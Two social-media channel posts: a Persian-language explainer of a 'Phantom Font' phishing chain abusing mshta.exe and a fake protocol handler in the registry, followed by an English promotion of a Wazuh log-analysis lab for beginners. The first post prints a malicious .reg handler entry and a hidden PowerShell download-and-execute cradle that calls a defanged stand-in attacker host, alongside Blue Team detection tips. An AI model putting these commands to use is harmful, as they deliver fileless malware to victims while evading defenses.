🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

✅ به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javascript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🧠 Log Analysis + Wazuh Integration — Hands-On Mini Lab for Blue Teamers 🚀

Just finished going through this practical guide on Linux & Windows log analysis with Wazuh and it’s one of the clearest step-by-step walkthroughs I’ve seen for juniors and SOC beginners.

Here’s what you’ll practice inside the PDF:

🔹 Linux Log Analysis

Exploring key log files under /var/log (boot, cron, secure, mail, httpd, messages)
Verifying package installation logs via apt
Reviewing firewall activity with UFW logs

🔹 Windows Event Log Analysis

Enabling audit policies via Local Security Policy
Using Event Viewer to track security events (e.g. 4625, 4776)
Simulating RDP brute-force attempts and interpreting the resulting logs

🔹 Wazuh Integration (SIEM)

Configuring ossec.conf for Linux & Windows log collection
Validating events in the Wazuh dashboard (Threat Hunting & Discover views)
Correlating firewall, package, and authentication events across hosts

🎯 Great for:
Students, SOC interns, junior analysts, and anyone who wants a lab-style intro to log analysis + Wazuh without getting lost in theory.

📘 I’ve attached the PDF — worth saving if you’re building your Blue Team fundamentals or preparing for SOC roles.

What other SIEM or log analysis topics would you like to see broken down like this?

#Wazuh #SIEM #LogAnalysis #SOCAnalyst #BlueTeam #DFIR #Linux #WindowsSecurity #CyberSecurity #ThreatHunting

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer